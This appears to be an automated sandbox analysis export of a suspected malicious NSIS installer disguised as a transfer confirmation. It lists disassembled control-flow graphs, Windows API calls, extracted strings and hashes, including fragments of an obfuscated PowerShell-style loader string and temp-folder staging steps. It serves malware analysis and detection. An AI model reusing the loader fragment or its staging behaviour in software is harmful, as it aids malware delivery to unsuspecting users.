4394 4027ea 4395 402893 4394->4395 4396 4027f6 GlobalAlloc 4394->4396 4397 40289b DeleteFileW 4395->4397 4398 4028ae 4395->4398 4399 40288a CloseHandle 4396->4399 4400 40280f 4396->4400 4397->4398 4399->4395 4413 40330d SetFilePointer 4400->4413 4402 402815 4403 4032f7 ReadFile 4402->4403 4404 40281e GlobalAlloc 4403->4404 4405 402862 WriteFile GlobalFree 4404->4405 4406 40282e 4404->4406 4408 403060 46 API calls 4405->4408 4407 403060 46 API calls 4406->4407 4411 40283b 4407->4411 4409 402887 4408->4409 4409->4399 4410 402859 GlobalFree 4410->4405 4411->4410 4412->4394 4413->4402 4414 4028b4 4415 402b1b 18 API calls 4414->4415 4416 4028ba 4415->4416 4417 4028f6 4416->4417 4418 4028dd 4416->4418 4419 402791 4416->4419 4421 402900 4417->4421 4422 40290c 4417->4422 4420 4028e2 4418->4420 4427 4028f3 4418->4427 4428 405ee8 lstrcpynW 4420->4428 4424 402b1b 18 API calls 4421->4424 4423 405f0a 18 API calls 4422->4423 4423->4427 4424->4427 4427->4419 4429 405e2f wsprintfW 4427->4429 4428->4419 4429->4419 4430 4014b8 4431 4014be 4430->4431 4432 401389 2 API calls 4431->4432 4433 4014c6 4432->4433 3684 4015b9 3685 402b38 18 API calls 3684->3685 3686 4015c0 3685->3686 3687 4059de 4 API calls 3686->3687 3697 4015c9 3687->3697 3688 401614 3689 401646 3688->3689 3690 401619 3688->3690 3694 401423 25 API calls 3689->3694 3702 401423 3690->3702 3691 405960 CharNextW 3693 4015d7 CreateDirectoryW 3691->3693 3696 4015ed GetLastError 3693->3696 3693->3697 3701 40163e 3694->3701 3696->3697 3698 4015fa GetFileAttributesW 3696->3698 3697->3688 3697->3691 3698->3697 3700 40162d SetCurrentDirectoryW 3700->3701 3703 405192 25 API calls 3702->3703 3704 401431 3703->3704 3705 405ee8 lstrcpynW 3704->3705 3705->3700 4434 401939 4435 402b38 18 API calls 4434->4435 4436 401940 lstrlenW 4435->4436 4437 4024e6 4436->4437 4438 402939 4439 402b1b 18 API calls 4438->4439 4440 40293f 4439->4440 4441 402972 4440->4441 4442 40294d 4440->4442 4444 402791 4440->4444 4443 405f0a 18 API calls 4441->4443 4441->4444 4442->4444 4446 405e2f wsprintfW 4442->4446 4443->4444 4446->4444 4447 40653d 4449 4063c1 4447->4449 4448 406d2c 4449->4448 4450 406442 GlobalFree 4449->4450 4451 40644b GlobalAlloc 4449->4451 4452 4064c2 GlobalAlloc 4449->4452 4453 4064b9 GlobalFree 4449->4453 4450->4451 4451->4448 4451->4449 4452->4448 4452->4449 4453->4452 4454 40173f 4455 402b38 18 API calls 4454->4455 4456 401746 4455->4456 4457 405b83 2 API calls 4456->4457 4458 40174d 4457->4458 4458->4458

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 17 403426-40342a 15->17 18 40342b-40342f 15->18 26 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->26 27 40356a-403584 DeleteFileW call 402dba 16->27 17->18 20 403435-40343b 18->20 21 4034c9-4034d4 call 405960 18->21 24 403455-40346c 20->24 25 40343d-403444 20->25 21->11 37 4034d6-4034d7 21->37 33 40349a-4034b0 24->33 34 40346e-403484 24->34 31 403446-403449 25->31 32 40344b 25->32 26->27 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 26->42 44 40361a-403629 call 4037c0 OleUninitialize 27->44 45 40358a-403590 27->45 31->24 31->32 32->24 33->21 36 4034b2-4034c7 33->36 34->33 39 403486-40348e 34->39 36->21 43 4034e6-4034f3 call 405ee8 36->43 37->11 40 403490-403493 39->40 41 403495 39->41 40->33 40->41 41->33 42->27 42->44 43->16 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 47 403592-40359d call 405960 45->47 48 40360a-403611 call 4038b2 45->48 62 4035d4-4035de 47->62 63 40359f-4035b0 47->63 56 403616 48->56 56->44 60 4037a8-4037b0 57->60 61 40372d-40374a call 406252 * 3 57->61 69 4037b2 60->69 70 4037b6-4037ba ExitProcess 60->70 90 403794-40379f ExitWindowsEx 61->90 91 40374c-40374e 61->91 65 4035e0-4035ee call 405a3b 62->65 66 403645-40365f lstrcatW lstrcmpiW 62->66 68 4035b2-4035b4 63->68 65->44 80 4035f0-403606 call 405ee8 * 2 65->80 66->44 72 403661-403677 CreateDirectoryW SetCurrentDirectoryW 66->72 74 4035b6-4035cc 68->74 75 4035ce-4035d2 68->75 69->70 77 403684-4036ad call 405ee8 72->77 78 403679-40367f call 405ee8 72->78 74->62 74->75 75->62 75->68 89 4036b2-4036ce call 405f0a DeleteFileW 77->89 78->77 80->48 100 4036d0-4036e0 CopyFileW 89->100 101 40370f-403717 89->101 90->60 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 98 403754-403766 GetCurrentProcess 94->98 96->60 98->90 107 403768-40378a 98->107 100->101 103 4036e2-403702 call 405d82 call 405f0a call 405663 100->103 101->89 102 403719-403720 call 405d82 101->102 102->44 103->101 115 403704-40370b CloseHandle 103->115 107->90 115->101
                  APIs
                  • #17.COMCTL32 ref: 00403377
                  • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                  • OleInitialize.OLE32(00000000), ref: 00403389
                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000000), ref: 004033D9
                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000020), ref: 00403400
                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040351A
                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403526
                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040353A
                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403542
                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403553
                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040355B
                  • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                  • OleUninitialize.OLE32(?), ref: 0040361F
                  • ExitProcess.KERNEL32 ref: 0040363F
                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
                  • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",00000000,?), ref: 00403657
                  • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403663
                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 0040366A
                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ",?), ref: 004036C4
                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,0041FE90,00000001), ref: 004036D8
                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                  • ExitProcess.KERNEL32 ref: 004037BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                  • String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen$C:\Users\user\Desktop$C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                  • API String ID: 4107622049-591496453
                  • Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                  • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                  • Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                  • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 140 4053d9-4053dc 117->140 141 4053bd-4053d7 SendMessageW * 2 117->141 120 405486-4054a8 GetDlgItem CreateThread FindCloseChangeNotification 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 125 4054e5-4054eb 123->125 126 405539-40553d 123->126 128 4054c5-4054d4 ShowWindow * 2 call 404162 124->128 129 4054fe-405507 call 404194 124->129 131 405513-405523 ShowWindow 125->131 132 4054ed-4054f9 call 404106 125->132 126->129 135 40553f-405545 126->135 128->123 137 40550c-405510 129->137 138 405533-405534 call 404106 131->138 139 405525-40552e call 405192 131->139 132->129 135->129 142 405547-40555a SendMessageW 135->142 138->126 139->138 143 4053ec-405403 call 40412d 140->143 144 4053de-4053ea SendMessageW 140->144 141->140 145 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 142->145 146 40565c-40565e 142->146 155 405405-405419 ShowWindow 143->155 156 405439-40545a GetDlgItem SendMessageW 143->156 144->143 153 4055a0-4055b5 TrackPopupMenu 145->153 154 40558d-40559d GetWindowRect 145->154 146->137 153->146 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->146 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->146 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->146
                  APIs
                  • GetDlgItem.USER32(?,00000403), ref: 00405330
                  • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                  • GetClientRect.USER32(?,?), ref: 0040537C
                  • GetSystemMetrics.USER32(00000015), ref: 00405384
                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                  • ShowWindow.USER32(?,00000008), ref: 00405420
                  • GetDlgItem.USER32(?,000003EC), ref: 00405441
                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                  • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                    • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                  • GetDlgItem.USER32(?,000003EC), ref: 00405493
                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
                  • ShowWindow.USER32(00000000), ref: 004054CC
                  • ShowWindow.USER32(?,00000008), ref: 004054D1
                  • ShowWindow.USER32(00000008), ref: 0040551B
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                  • CreatePopupMenu.USER32 ref: 00405560
                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                  • GetWindowRect.USER32(?,?), ref: 00405594
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                  • OpenClipboard.USER32(00000000), ref: 004055F5
                  • EmptyClipboard.USER32 ref: 004055FB
                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                  • GlobalLock.KERNEL32(00000000), ref: 00405611
                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                  • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                  • CloseClipboard.USER32 ref: 00405656
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                  • String ID: {
                  • API String ID: 4154960007-366298937
                  • Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                  • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                  • Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                  • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 435 4060f0-4060fc call 405e2f 430->435 436 4060fe-40610b call 405ee8 430->436 438 406130-406141 lstrlenW 431->438 439 406123-40612b call 405f0a 431->439 432->433 434 405fdd-405fe1 432->434 437 405ff6-405ffd 433->437 434->433 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 458 4060dc-4060e2 call 40617c 452->458 455 4060c1-4060c3 453->455 456 406058-406066 GetWindowsDirectoryW 453->456 459 4060c5-4060c9 454->459 455->459 460 406068-406072 455->460 456->455 458->438 459->458 459->462 464 406074-406077 460->464 465 40608c-4060a2 SHGetSpecialFolderLocation 460->465 461->459 462->458 467 4060d1-4060d7 lstrcatW 462->467 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->458 473 406088-40608a 469->473 470->459 470->471 471->455 473->459 473->465
                  APIs
                  • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                  • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
                  • CoTaskMemFree.OLE32(?), ref: 004060B3
                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                  • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                  • String ID: ';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                  • API String ID: 900638850-3768624827
                  • Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                  • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                  • Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                  • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 474 405770-405796 call 405a3b 477 405798-4057aa DeleteFileW 474->477 478 4057af-4057b6 474->478 479 40592c-405930 477->479 480 4057b8-4057ba 478->480 481 4057c9-4057d9 call 405ee8 478->481 483 4057c0-4057c3 480->483 484 4058da-4058df 480->484 487 4057e8-4057e9 call 40597f 481->487 488 4057db-4057e6 lstrcatW 481->488 483->481 483->484 484->479 486 4058e1-4058e4 484->486 489 4058e6-4058ec 486->489 490 4058ee-4058f6 call 40622b 486->490 491 4057ee-4057f2 487->491 488->491 489->479 490->479 498 4058f8-40590c call 405933 call 405728 490->498 494 4057f4-4057fc 491->494 495 4057fe-405804 lstrcatW 491->495 494->495 497 405809-405825 lstrlenW FindFirstFileW 494->497 495->497 499 40582b-405833 497->499 500 4058cf-4058d3 497->500 516 405924-405927 call 405192 498->516 517 40590e-405911 498->517 503 405853-405867 call 405ee8 499->503 504 405835-40583d 499->504 500->484 502 4058d5 500->502 502->484 514 405869-405871 503->514 515 40587e-405889 call 405728 503->515 506 4058b2-4058c2 FindNextFileW 504->506 507 40583f-405847 504->507 506->499 510 4058c8-4058c9 FindClose 506->510 507->503 511 405849-405851 507->511 510->500 511->503 511->506 514->506 519 405873-40587c call 405770 514->519 527 4058aa-4058ad call 405192 515->527 528 40588b-40588e 515->528 516->479 517->489 518 405913-405922 call 405192 call 405d82 517->518 518->479 519->506 527->506 530 405890-4058a0 call 405192 call 405d82 528->530 531 4058a2-4058a8 528->531 530->506 531->506
                  APIs
                  • DeleteFileW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 00405799
                  • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
                  • lstrcatW.KERNEL32(?,00409014), ref: 00405804
                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 0040580A
                  • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 0040581A
                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                  • FindClose.KERNEL32(00000000), ref: 004058C9
                  Strings
                  • \*.*, xrefs: 004057DB
                  • "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 00405779
                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040577E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-596837719
                  • Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                  • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                  • Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                  • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                  • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
